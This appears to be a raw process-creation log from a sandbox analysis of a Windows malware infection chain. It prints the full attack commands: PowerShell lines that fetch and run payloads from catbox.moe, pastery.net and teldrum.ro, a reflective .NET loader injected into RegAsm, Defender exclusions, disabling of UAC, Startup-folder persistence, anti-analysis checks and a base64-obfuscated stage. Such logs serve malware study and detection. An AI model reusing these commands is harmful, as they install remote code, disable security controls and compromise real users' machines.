Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL \| Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF \| Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO \| Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL01.txt"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL02.txt"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL31.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /k reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\AppData\Local\Temp\x.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\cxtyy.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qtglm.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\tezxb.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\bweyr.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\bnltz.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA \| Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $hzjmp = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGkAVA' + [char]66 + 'DAHYAWAAkADsAIAAnADsAKQAgACkAIAAnACcAbQ' + [char]66 + 'zAGEAZw' + [char]66 + 'lAHIAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EAEQAIA' + [char]66 + 'EACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + '0AGUAbA' + [char]66 + 'kAHIAdQ' + [char]66 + 'tAC4Acg' + [char]66 + 'vAC8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAGcAbA' + [char]66 + 'vAGIAYQ' + [char]66 + 'sAHgAMQAuAGoAcA' + [char]66 + 'nACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcALgApACAAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + '	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL \| Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF \| Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO \| Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1	Jump to behavior
